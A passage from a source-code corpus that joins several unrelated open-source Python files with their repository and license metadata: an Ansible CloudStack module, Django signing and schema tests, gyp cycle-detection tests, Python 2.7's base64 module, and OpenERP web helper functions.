if instance:
if instance['state'].lower() in ['running', 'starting']:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.query_api('rebootVirtualMachine', id=instance['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
elif instance['state'].lower() in ['stopping', 'stopped']:
instance = self.start_instance()
return instance
def restore_instance(self):
instance = self.get_instance()
self.result['changed'] = True
# in check mode instance may not be instanciated
if instance:
args = {}
args['templateid'] = self.get_template_or_iso(key='id')
args['virtualmachineid'] = instance['id']
res = self.query_api('restoreVirtualMachine', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(res, 'virtualmachine')
return instance
def get_result(self, instance):
super(AnsibleCloudStackInstance, self).get_result(instance)
if instance:
self.result['user_data'] = self._get_instance_user_data(instance)
if 'securitygroup' in instance:
security_groups = []
for securitygroup in instance['securitygroup']:
security_groups.append(securitygroup['name'])
self.result['security_groups'] = security_groups
if 'affinitygroup' in instance:
affinity_groups = []
for affinitygroup in instance['affinitygroup']:
affinity_groups.append(affinitygroup['name'])
self.result['affinity_groups'] = affinity_groups
if 'nic' in instance:
for nic in instance['nic']:
if nic['isdefault']:
if 'ipaddress' in nic:
self.result['default_ip'] = nic['ipaddress']
if 'ip6address' in nic:
self.result['default_ip6'] = nic['ip6address']
return self.result
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
name=dict(),
display_name=dict(),
group=dict(),
state=dict(choices=['present', 'deployed', 'started', 'stopped', 'restarted', 'restored', 'absent', 'destroyed', 'expunged'], default='present'),
service_offering=dict(),
cpu=dict(type='int'),
cpu_speed=dict(type='int'),
memory=dict(type='int'),
template=dict(),
iso=dict(),
template_filter=dict(
default="executable",
aliases=['iso_filter'],
choices=['all', 'featured', 'self', 'selfexecutable', 'sharedexecutable', 'executable', 'community']
),
networks=dict(type='list', aliases=['network']),
ip_to_networks=dict(type='list', aliases=['ip_to_network']),
ip_address=dict(defaul=None),
ip6_address=dict(defaul=None),
disk_offering=dict(),
disk_size=dict(type='int'),
root_disk_size=dict(type='int'),
keyboard=dict(type='str', choices=['de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us']),
hypervisor=dict(choices=CS_HYPERVISORS),
host=dict(),
security_groups=dict(type='list', aliases=['security_group']),
affinity_groups=dict(type='list', aliases=['affinity_group']),
domain=dict(),
account=dict(),
project=dict(),
user_data=dict(),
zone=dict(),
ssh_key=dict(),
force=dict(type='bool', default=False),
tags=dict(type='list', aliases=['tag']),
details=dict(type='dict'),
poll_async=dict(type='bool', default=True),
allow_root_disk_shrink=dict(type='bool', default=False),
))
required_together = cs_required_together()
required_together.extend([
['cpu', 'cpu_speed', 'memory'],
])
module = AnsibleModule(
argument_spec=argument_spec,
required_together=required_together,
required_one_of=(
['display_name', 'name'],
),
mutually_exclusive=(
['template', 'iso'],
),
supports_check_mode=True
)
acs_instance = AnsibleCloudStackInstance(module)
state = module.params.get('state')
if state in ['absent', 'destroyed']:
instance = acs_instance.absent_instance()
elif state in ['expunged']:
instance = acs_instance.expunge_instance()
elif state in ['restored']:
acs_instance.present_instance()
instance = acs_instance.restore_instance()
elif state in ['present', 'deployed']:
instance = acs_instance.present_instance()
elif state in ['stopped']:
acs_instance.present_instance(start_vm=False)
instance = acs_instance.stop_instance()
elif state in ['started']:
acs_instance.present_instance()
instance = acs_instance.start_instance()
elif state in ['restarted']:
acs_instance.present_instance()
instance = acs_instance.restart_instance()
if instance and 'state' in instance and instance['state'].lower() == 'error':
module.fail_json(msg="Instance named '%s' in error state." % module.params.get('name'))
result = acs_instance.get_result(instance)
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
benjaminrigaud/django
|
tests/signing/tests.py
|
36
|
4807
|
from __future__ import unicode_literals
import time
from django.core import signing
from django.test import TestCase
from django.utils.encoding import force_str
from django.utils import six
class TestSigner(TestCase):
def test_signature(self):
"signature() method should generate a signature"
signer = signing.Signer('predictable-secret')
signer2 = signing.Signer('predictable-secret2')
for s in (
b'hello',
b'3098247:529:087:',
'\u2019'.encode('utf-8'),
):
self.assertEqual(
signer.signature(s),
signing.base64_hmac(signer.salt + 'signer', s,
'predictable-secret').decode()
)
self.assertNotEqual(signer.signature(s), signer2.signature(s))
def test_signature_with_salt(self):
"signature(value, salt=...) should work"
signer = signing.Signer('predictable-secret', salt='extra-salt')
self.assertEqual(
signer.signature('hello'),
signing.base64_hmac('extra-salt' + 'signer',
'hello', 'predictable-secret').decode()
)
self.assertNotEqual(
signing.Signer('predictable-secret', salt='one').signature('hello'),
signing.Signer('predictable-secret', salt='two').signature('hello'))
def test_sign_unsign(self):
"sign/unsign should be reversible"
signer = signing.Signer('predictable-secret')
examples = [
'q;wjmbk;wkmb',
'3098247529087',
'3098247:529:087:',
'jkw osanteuh ,rcuh nthu aou oauh ,ud du',
'\u2019',
]
if six.PY2:
examples.append(b'a byte string')
for example in examples:
signed = signer.sign(example)
self.assertIsInstance(signed, str)
self.assertNotEqual(force_str(example), signed)
self.assertEqual(example, signer.unsign(signed))
def unsign_detects_tampering(self):
"unsign should raise an exception if the value has been tampered with"
signer = signing.Signer('predictable-secret')
value = 'Another string'
signed_value = signer.sign(value)
transforms = (
lambda s: s.upper(),
lambda s: s + 'a',
lambda s: 'a' + s[1:],
lambda s: s.replace(':', ''),
)
self.assertEqual(value, signer.unsign(signed_value))
for transform in transforms:
self.assertRaises(
signing.BadSignature, signer.unsign, transform(signed_value))
def test_dumps_loads(self):
"dumps and loads be reversible for any JSON serializable object"
objects = [
['a', 'list'],
'a unicode string \u2019',
{'a': 'dictionary'},
]
if six.PY2:
objects.append(b'a byte string')
for o in objects:
self.assertNotEqual(o, signing.dumps(o))
self.assertEqual(o, signing.loads(signing.dumps(o)))
self.assertNotEqual(o, signing.dumps(o, compress=True))
self.assertEqual(o, signing.loads(signing.dumps(o, compress=True)))
def test_decode_detects_tampering(self):
"loads should raise exception for tampered objects"
transforms = (
lambda s: s.upper(),
lambda s: s + 'a',
lambda s: 'a' + s[1:],
lambda s: s.replace(':', ''),
)
value = {
'foo': 'bar',
'baz': 1,
}
encoded = signing.dumps(value)
self.assertEqual(value, signing.loads(encoded))
for transform in transforms:
self.assertRaises(
signing.BadSignature, signing.loads, transform(encoded))
def test_works_with_non_ascii_keys(self):
binary_key = b'\xe7' # Set some binary (non-ASCII key)
s = signing.Signer(binary_key)
self.assertEqual('foo:6NB0fssLW5RQvZ3Y-MTerq2rX7w', s.sign('foo'))
class TestTimestampSigner(TestCase):
def test_timestamp_signer(self):
value = 'hello'
_time = time.time
time.time = lambda: 123456789
try:
signer = signing.TimestampSigner('predictable-key')
ts = signer.sign(value)
self.assertNotEqual(ts,
signing.Signer('predictable-key').sign(value))
self.assertEqual(signer.unsign(ts), value)
time.time = lambda: 123456800
self.assertEqual(signer.unsign(ts, max_age=12), value)
self.assertEqual(signer.unsign(ts, max_age=11), value)
self.assertRaises(
signing.SignatureExpired, signer.unsign, ts, max_age=10)
finally:
time.time = _time
|
bsd-3-clause
|
jiumx60rus/grishyGhost
|
node_modules/nodegit/node_modules/pangyp/gyp/pylib/gyp/input_test.py
|
1841
|
3207
|
#!/usr/bin/env python
# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the input.py file."""
import gyp.input
import unittest
import sys
class TestFindCycles(unittest.TestCase):
def setUp(self):
self.nodes = {}
for x in ('a', 'b', 'c', 'd', 'e'):
self.nodes[x] = gyp.input.DependencyGraphNode(x)
def _create_dependency(self, dependent, dependency):
dependent.dependencies.append(dependency)
dependency.dependents.append(dependent)
def test_no_cycle_empty_graph(self):
for label, node in self.nodes.iteritems():
self.assertEquals([], node.FindCycles())
def test_no_cycle_line(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
self._create_dependency(self.nodes['c'], self.nodes['d'])
for label, node in self.nodes.iteritems():
self.assertEquals([], node.FindCycles())
def test_no_cycle_dag(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['a'], self.nodes['c'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
for label, node in self.nodes.iteritems():
self.assertEquals([], node.FindCycles())
def test_cycle_self_reference(self):
self._create_dependency(self.nodes['a'], self.nodes['a'])
self.assertEquals([[self.nodes['a'], self.nodes['a']]],
self.nodes['a'].FindCycles())
def test_cycle_two_nodes(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['a'])
self.assertEquals([[self.nodes['a'], self.nodes['b'], self.nodes['a']]],
self.nodes['a'].FindCycles())
self.assertEquals([[self.nodes['b'], self.nodes['a'], self.nodes['b']]],
self.nodes['b'].FindCycles())
def test_two_cycles(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['a'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
self._create_dependency(self.nodes['c'], self.nodes['b'])
cycles = self.nodes['a'].FindCycles()
self.assertTrue(
[self.nodes['a'], self.nodes['b'], self.nodes['a']] in cycles)
self.assertTrue(
[self.nodes['b'], self.nodes['c'], self.nodes['b']] in cycles)
self.assertEquals(2, len(cycles))
def test_big_cycle(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
self._create_dependency(self.nodes['c'], self.nodes['d'])
self._create_dependency(self.nodes['d'], self.nodes['e'])
self._create_dependency(self.nodes['e'], self.nodes['a'])
self.assertEquals([[self.nodes['a'],
self.nodes['b'],
self.nodes['c'],
self.nodes['d'],
self.nodes['e'],
self.nodes['a']]],
self.nodes['a'].FindCycles())
if __name__ == '__main__':
unittest.main()
|
mit
|
dpiers/coderang-meteor
|
public/jsrepl/extern/python/closured/lib/python2.7/base64.py
|
229
|
11357
|
#! /usr/bin/env python
"""RFC 3548: Base16, Base32, Base64 Data Encodings"""
# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
import re
import struct
import binascii
__all__ = [
# Legacy interface exports traditional RFC 1521 Base64 encodings
'encode', 'decode', 'encodestring', 'decodestring',
# Generalized interface for other encodings
'b64encode', 'b64decode', 'b32encode', 'b32decode',
'b16encode', 'b16decode',
# Standard Base64 encoding
'standard_b64encode', 'standard_b64decode',
# Some common Base64 alternatives. As referenced by RFC 3458, see thread
# starting at:
#
# http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
'urlsafe_b64encode', 'urlsafe_b64decode',
]
_translation = [chr(_x) for _x in range(256)]
EMPTYSTRING = ''
def _translate(s, altchars):
translation = _translation[:]
for k, v in altchars.items():
translation[ord(k)] = v
return s.translate(''.join(translation))
# Base64 encoding/decoding uses binascii
def b64encode(s, altchars=None):
"""Encode a string using Base64.
s is the string to encode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies an
alternative alphabet for the '+' and '/' characters. This allows an
application to e.g. generate url or filesystem safe Base64 strings.
The encoded string is returned.
"""
# Strip off the trailing newline
encoded = binascii.b2a_base64(s)[:-1]
if altchars is not None:
return _translate(encoded, {'+': altchars[0], '/': altchars[1]})
return encoded
def b64decode(s, altchars=None):
"""Decode a Base64 encoded string.
s is the string to decode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies the
alternative alphabet used instead of the '+' and '/' characters.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if altchars is not None:
s = _translate(s, {altchars[0]: '+', altchars[1]: '/'})
try:
return binascii.a2b_base64(s)
except binascii.Error, msg:
# Transform this exception for consistency
raise TypeError(msg)
def standard_b64encode(s):
"""Encode a string using the standard Base64 alphabet.
s is the string to encode. The encoded string is returned.
"""
return b64encode(s)
def standard_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
"""
return b64decode(s)
def urlsafe_b64encode(s):
"""Encode a string using a url-safe Base64 alphabet.
s is the string to encode. The encoded string is returned. The alphabet
uses '-' instead of '+' and '_' instead of '/'.
"""
return b64encode(s, '-_')
def urlsafe_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
The alphabet uses '-' instead of '+' and '_' instead of '/'.
"""
return b64decode(s, '-_')
# Base32 encoding/decoding must be done in Python
_b32alphabet = {
0: 'A', 9: 'J', 18: 'S', 27: '3',
1: 'B', 10: 'K', 19: 'T', 28: '4',
2: 'C', 11: 'L', 20: 'U', 29: '5',
3: 'D', 12: 'M', 21: 'V', 30: '6',
4: 'E', 13: 'N', 22: 'W', 31: '7',
5: 'F', 14: 'O', 23: 'X',
6: 'G', 15: 'P', 24: 'Y',
7: 'H', 16: 'Q', 25: 'Z',
8: 'I', 17: 'R', 26: '2',
}
_b32tab = _b32alphabet.items()
_b32tab.sort()
_b32tab = [v for k, v in _b32tab]
_b32rev = dict([(v, long(k)) for k, v in _b32alphabet.items()])
def b32encode(s):
"""Encode a string using Base32.
s is the string to encode. The encoded string is returned.
"""
parts = []
quanta, leftover = divmod(len(s), 5)
# Pad the last quantum with zero bits if necessary
if leftover:
s += ('\0' * (5 - leftover))
quanta += 1
for i in range(quanta):
# c1 and c2 are 16 bits wide, c3 is 8 bits wide. The intent of this
# code is to process the 40 bits in units of 5 bits. So we take the 1
# leftover bit of c1 and tack it onto c2. Then we take the 2 leftover
# bits of c2 and tack them onto c3. The shifts and masks are intended
# to give us values of exactly 5 bits in width.
c1, c2, c3 = struct.unpack('!HHB', s[i*5:(i+1)*5])
c2 += (c1 & 1) << 16 # 17 bits wide
c3 += (c2 & 3) << 8 # 10 bits wide
parts.extend([_b32tab[c1 >> 11], # bits 1 - 5
_b32tab[(c1 >> 6) & 0x1f], # bits 6 - 10
_b32tab[(c1 >> 1) & 0x1f], # bits 11 - 15
_b32tab[c2 >> 12], # bits 16 - 20 (1 - 5)
_b32tab[(c2 >> 7) & 0x1f], # bits 21 - 25 (6 - 10)
_b32tab[(c2 >> 2) & 0x1f], # bits 26 - 30 (11 - 15)
_b32tab[c3 >> 5], # bits 31 - 35 (1 - 5)
_b32tab[c3 & 0x1f], # bits 36 - 40 (1 - 5)
])
encoded = EMPTYSTRING.join(parts)
# Adjust for any leftover partial quanta
if leftover == 1:
return encoded[:-6] + '======'
elif leftover == 2:
return encoded[:-4] + '===='
elif leftover == 3:
return encoded[:-3] + '==='
elif leftover == 4:
return encoded[:-1] + '='
return encoded
def b32decode(s, casefold=False, map01=None):
"""Decode a Base32 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
RFC 3548 allows for optional mapping of the digit 0 (zero) to the letter O
(oh), and for optional mapping of the digit 1 (one) to either the letter I
(eye) or letter L (el). The optional argument map01 when not None,
specifies which letter the digit 1 should be mapped to (when map01 is not
None, the digit 0 is always mapped to the letter O). For security
purposes the default is None, so that 0 and 1 are not allowed in the
input.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
quanta, leftover = divmod(len(s), 8)
if leftover:
raise TypeError('Incorrect padding')
# Handle section 2.4 zero and one mapping. The flag map01 will be either
# False, or the character to map the digit 1 (one) to. It should be
# either L (el) or I (eye).
if map01:
s = _translate(s, {'0': 'O', '1': map01})
if casefold:
s = s.upper()
# Strip off pad characters from the right. We need to count the pad
# characters because this will tell us how many null bytes to remove from
# the end of the decoded string.
padchars = 0
mo = re.search('(?P<pad>[=]*)$', s)
if mo:
padchars = len(mo.group('pad'))
if padchars > 0:
s = s[:-padchars]
# Now decode the full quanta
parts = []
acc = 0
shift = 35
for c in s:
val = _b32rev.get(c)
if val is None:
raise TypeError('Non-base32 digit found')
acc += _b32rev[c] << shift
shift -= 5
if shift < 0:
parts.append(binascii.unhexlify('%010x' % acc))
acc = 0
shift = 35
# Process the last, partial quanta
last = binascii.unhexlify('%010x' % acc)
if padchars == 0:
last = '' # No characters
elif padchars == 1:
last = last[:-1]
elif padchars == 3:
last = last[:-2]
elif padchars == 4:
last = last[:-3]
elif padchars == 6:
last = last[:-4]
else:
raise TypeError('Incorrect padding')
parts.append(last)
return EMPTYSTRING.join(parts)
# RFC 3548, Base 16 Alphabet specifies uppercase, but hexlify() returns
# lowercase. The RFC also recommends against accepting input case
# insensitively.
def b16encode(s):
"""Encode a string using Base16.
s is the string to encode. The encoded string is returned.
"""
return binascii.hexlify(s).upper()
def b16decode(s, casefold=False):
"""Decode a Base16 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if casefold:
s = s.upper()
if re.search('[^0-9A-F]', s):
raise TypeError('Non-base16 digit found')
return binascii.unhexlify(s)
# Legacy interface. This code could be cleaned up since I don't believe
# binascii has any line length limitations. It just doesn't seem worth it
# though.
MAXLINESIZE = 76 # Excluding the CRLF
MAXBINSIZE = (MAXLINESIZE//4)*3
def encode(input, output):
"""Encode a file."""
while True:
s = input.read(MAXBINSIZE)
if not s:
break
while len(s) < MAXBINSIZE:
ns = input.read(MAXBINSIZE-len(s))
if not ns:
break
s += ns
line = binascii.b2a_base64(s)
output.write(line)
def decode(input, output):
"""Decode a file."""
while True:
line = input.readline()
if not line:
break
s = binascii.a2b_base64(line)
output.write(s)
def encodestring(s):
"""Encode a string into multiple lines of base-64 data."""
pieces = []
for i in range(0, len(s), MAXBINSIZE):
chunk = s[i : i + MAXBINSIZE]
pieces.append(binascii.b2a_base64(chunk))
return "".join(pieces)
def decodestring(s):
"""Decode a string."""
return binascii.a2b_base64(s)
# Useable as a script...
def test():
"""Small test program"""
import sys, getopt
try:
opts, args = getopt.getopt(sys.argv[1:], 'deut')
except getopt.error, msg:
sys.stdout = sys.stderr
print msg
print """usage: %s [-d|-e|-u|-t] [file|-]
-d, -u: decode
-e: encode (default)
-t: encode and decode string 'Aladdin:open sesame'"""%sys.argv[0]
sys.exit(2)
func = encode
for o, a in opts:
if o == '-e': func = encode
if o == '-d': func = decode
if o == '-u': func = decode
if o == '-t': test1(); return
if args and args[0] != '-':
with open(args[0], 'rb') as f:
func(f, sys.stdout)
else:
func(sys.stdin, sys.stdout)
def test1():
s0 = "Aladdin:open sesame"
s1 = encodestring(s0)
s2 = decodestring(s1)
print s0, repr(s1), s2
if __name__ == '__main__':
test()
|
mit
|
ryanahall/django
|
tests/schema/fields.py
|
13
|
2628
|
from django.db.models.fields.related import (
RECURSIVE_RELATIONSHIP_CONSTANT, ManyRelatedObjectsDescriptor,
ManyToManyField, ManyToManyRel, RelatedField,
create_many_to_many_intermediary_model,
)
from django.utils.functional import curry
class CustomManyToManyField(RelatedField):
"""
Ticket #24104 - Need to have a custom ManyToManyField,
which is not an inheritor of ManyToManyField.
"""
many_to_many = True
def __init__(self, to, db_constraint=True, swappable=True, **kwargs):
try:
to._meta
except AttributeError:
to = str(to)
kwargs['rel'] = ManyToManyRel(
self, to,
related_name=kwargs.pop('related_name', None),
related_query_name=kwargs.pop('related_query_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),
symmetrical=kwargs.pop('symmetrical', to == RECURSIVE_RELATIONSHIP_CONSTANT),
through=kwargs.pop('through', None),
through_fields=kwargs.pop('through_fields', None),
db_constraint=db_constraint,
)
self.swappable = swappable
self.db_table = kwargs.pop('db_table', None)
if kwargs['rel'].through is not None:
assert self.db_table is None, "Cannot specify a db_table if an intermediary model is used."
super(CustomManyToManyField, self).__init__(**kwargs)
def contribute_to_class(self, cls, name, **kwargs):
if self.remote_field.symmetrical and (
self.remote_field.model == "self" or self.remote_field.model == cls._meta.object_name):
self.remote_field.related_name = "%s_rel_+" % name
super(CustomManyToManyField, self).contribute_to_class(cls, name, **kwargs)
if not self.remote_field.through and not cls._meta.abstract and not cls._meta.swapped:
self.remote_field.through = create_many_to_many_intermediary_model(self, cls)
setattr(cls, self.name, ManyRelatedObjectsDescriptor(self.remote_field))
self.m2m_db_table = curry(self._get_m2m_db_table, cls._meta)
def get_internal_type(self):
return 'ManyToManyField'
# Copy those methods from ManyToManyField because they don't call super() internally
contribute_to_related_class = ManyToManyField.__dict__['contribute_to_related_class']
_get_m2m_attr = ManyToManyField.__dict__['_get_m2m_attr']
_get_m2m_reverse_attr = ManyToManyField.__dict__['_get_m2m_reverse_attr']
_get_m2m_db_table = ManyToManyField.__dict__['_get_m2m_db_table']
class InheritedManyToManyField(ManyToManyField):
pass
|
bsd-3-clause
|
grap/OCB
|
addons/web/controllers/main.py
|
2
|
70114
|
# -*- coding: utf-8 -*-
import ast
import base64
import csv
import glob
import itertools
import logging
import operator
import datetime
import hashlib
import os
import re
import simplejson
import time
import urllib
import urllib2
import urlparse
import xmlrpclib
import zlib
from xml.etree import ElementTree
from cStringIO import StringIO
import babel.messages.pofile
import werkzeug.utils
import werkzeug.wrappers
try:
import xlwt
except ImportError:
xlwt = None
import openerp
import openerp.modules.registry
from openerp.tools.translate import _
from openerp.tools import config, ustr
from .. import http
openerpweb = http
#----------------------------------------------------------
# OpenERP Web helpers
#----------------------------------------------------------
def rjsmin(script):
""" Minify js with a clever regex.
Taken from http://opensource.perlig.de/rjsmin
Apache License, Version 2.0 """
def subber(match):
""" Substitution callback """
groups = match.groups()
return (
groups[0] or
groups[1] or
groups[2] or
groups[3] or
(groups[4] and '\n') or
(groups[5] and ' ') or
(groups[6] and ' ') or
(groups[7] and ' ') or
''
)
result = re.sub(
r'([^\047"/\000-\040]+)|((?:(?:\047[^\047\\\r\n]*(?:\\(?:[^\r\n]|\r?'
r'\n|\r)[^\047\\\r\n]*)*\047)|(?:"[^"\\\r\n]*(?:\\(?:[^\r\n]|\r?\n|'
r'\r)[^"\\\r\n]*)*"))[^\047"/\000-\040]*)|(?:(?<=[(,=:\[!&|?{};\r\n]'
r')(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/'
r'))*((?:/(?![\r\n/*])[^/\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*'
r'(?:\\[^\r\n][^\\\]\r\n]*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*'
r'))|(?:(?<=[\000-#%-,./:-@\[-^`{-~-]return)(?:[\000-\011\013\014\01'
r'6-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*((?:/(?![\r\n/*])[^/'
r'\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*(?:\\[^\r\n][^\\\]\r\n]'
r'*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*))|(?<=[^\000-!#%&(*,./'
r':-@\[\\^`{|~])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/'
r'*][^*]*\*+)*/))*(?:((?:(?://[^\r\n]*)?[\r\n]))(?:[\000-\011\013\01'
r'4\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*)+(?=[^\000-\040"#'
r'%-\047)*,./:-@\\-^`|-~])|(?<=[^\000-#%-,./:-@\[-^`{-~-])((?:[\000-'
r'\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=[^'
r'\000-#%-,./:-@\[-^`{-~-])|(?<=\+)((?:[\000-\011\013\014\016-\040]|'
r'(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=\+)|(?<=-)((?:[\000-\011\0'
r'13\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=-)|(?:[\0'
r'00-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))+|(?:'
r'(?:(?://[^\r\n]*)?[\r\n])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*'
r']*\*+(?:[^/*][^*]*\*+)*/))*)+', subber, '\n%s\n' % script
).strip()
return result
def db_list(req, force=False):
proxy = req.session.proxy("db")
dbs = proxy.list(force)
h = req.httprequest.environ['HTTP_HOST'].split(':')[0]
d = h.split('.')[0]
r = openerp.tools.config['dbfilter'].replace('%h', h).replace('%d', d)
dbs = [i for i in dbs if re.match(r, i)]
return dbs
def db_monodb_redirect(req):
return db_redirect(req, not config['list_db'])
def db_redirect(req, match_first_only_if_unique):
db = False
redirect = False
dbs = db_list(req, True)
# 1 try the db in the url
db_url = req.params.get('db')
if db_url and db_url in dbs:
return (db_url, False)
# 2 use the database from the cookie if it's listable and still listed
cookie_db = req.httprequest.cookies.get('last_used_database')
if cookie_db in dbs:
db = cookie_db
# 3 use the first db if user can list databases
if dbs and not db and (not match_first_only_if_unique or len(dbs) == 1):
db = dbs[0]
# redirect to the chosen db if multiple are available
if db and len(dbs) > 1:
query = dict(urlparse.parse_qsl(req.httprequest.query_string, keep_blank_values=True))
query.update({'db': db})
redirect = req.httprequest.path + '?' + urllib.urlencode(query)
return (db, redirect)
def db_monodb(req):
# if only one db exists, return it else return False
return db_redirect(req, True)[0]
def redirect_with_hash(req, url, code=303):
# Most IE and Safari versions decided not to preserve location.hash upon
# redirect. And even if IE10 pretends to support it, it still fails
# inexplicably in case of multiple redirects (and we do have some).
# See extensive test page at http://greenbytes.de/tech/tc/httpredirects/
return "<html><head><script>window.location = '%s' + location.hash;</script></head></html>" % url
def module_topological_sort(modules):
""" Return a list of module names sorted so that their dependencies of the
modules are listed before the module itself
modules is a dict of {module_name: dependencies}
:param modules: modules to sort
:type modules: dict
:returns: list(str)
"""
dependencies = set(itertools.chain.from_iterable(modules.itervalues()))
# incoming edge: dependency on other module (if a depends on b, a has an
# incoming edge from b, aka there's an edge from b to a)
# outgoing edge: other module depending on this one
# [Tarjan 1976], http://en.wikipedia.org/wiki/Topological_sorting#Algorithms
#L ← Empty list that will contain the sorted nodes
L = []
#S ← Set of all nodes with no outgoing edges (modules on which no other
# module depends)
S = set(module for module in modules if module not in dependencies)
visited = set()
#function visit(node n)
def visit(n):
#if n has not been visited yet then
if n not in visited:
#mark n as visited
visited.add(n)
#change: n not web module, can not be resolved, ignore
if n not in modules: return
#for each node m with an edge from m to n do (dependencies of n)
for m in modules[n]:
#visit(m)
visit(m)
#add n to L
L.append(n)
#for each node n in S do
for n in S:
#visit(n)
visit(n)
return L
def module_installed(req):
# Candidates module the current heuristic is the /static dir
loadable = openerpweb.addons_manifest.keys()
modules = {}
# Retrieve database installed modules
# TODO The following code should move to ir.module.module.list_installed_modules()
Modules = req.session.model('ir.module.module')
domain = [('state','=','installed'), ('name','in', loadable)]
for module in Modules.search_read(domain, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = req.session.model('ir.module.module.dependency').read(deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_installed_bypass_session(dbname):
loadable = openerpweb.addons_manifest.keys()
modules = {}
try:
registry = openerp.modules.registry.RegistryManager.get(dbname)
with registry.cursor() as cr:
m = registry.get('ir.module.module')
# TODO The following code should move to ir.module.module.list_installed_modules()
domain = [('state','=','installed'), ('name','in', loadable)]
ids = m.search(cr, 1, [('state','=','installed'), ('name','in', loadable)])
for module in m.read(cr, 1, ids, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = registry.get('ir.module.module.dependency').read(cr, 1, deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
except Exception,e:
pass
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_boot(req, db=None):
server_wide_modules = openerp.conf.server_wide_modules or ['web']
serverside = []
dbside = []
for i in server_wide_modules:
if i in openerpweb.addons_manifest:
serverside.append(i)
monodb = db or db_monodb(req)
if monodb:
dbside = module_installed_bypass_session(monodb)
dbside = [i for i in dbside if i not in serverside]
addons = serverside + dbside
return addons
def concat_xml(file_list):
"""Concatenate xml files
:param list(str) file_list: list of files to check
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
root = None
for fname in file_list:
with open(fname, 'rb') as fp:
contents = fp.read()
checksum.update(contents)
fp.seek(0)
xml = ElementTree.parse(fp).getroot()
if root is None:
root = ElementTree.Element(xml.tag)
#elif root.tag != xml.tag:
# raise ValueError("Root tags missmatch: %r != %r" % (root.tag, xml.tag))
for child in xml.getchildren():
root.append(child)
return ElementTree.tostring(root, 'utf-8'), checksum.hexdigest()
def concat_files(file_list, reader=None, intersperse=""):
""" Concatenates contents of all provided files
:param list(str) file_list: list of files to check
:param function reader: reading procedure for each file
:param str intersperse: string to intersperse between file contents
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
if reader is None:
def reader(f):
import codecs
with codecs.open(f, 'rb', "utf-8-sig") as fp:
return fp.read().encode("utf-8")
files_content = []
for fname in file_list:
contents = reader(fname)
checksum.update(contents)
files_content.append(contents)
files_concat = intersperse.join(files_content)
return files_concat, checksum.hexdigest()
concat_js_cache = {}
def concat_js(file_list):
content, checksum = concat_files(file_list, intersperse=';')
if checksum in concat_js_cache:
content = concat_js_cache[checksum]
else:
content = rjsmin(content)
concat_js_cache[checksum] = content
return content, checksum
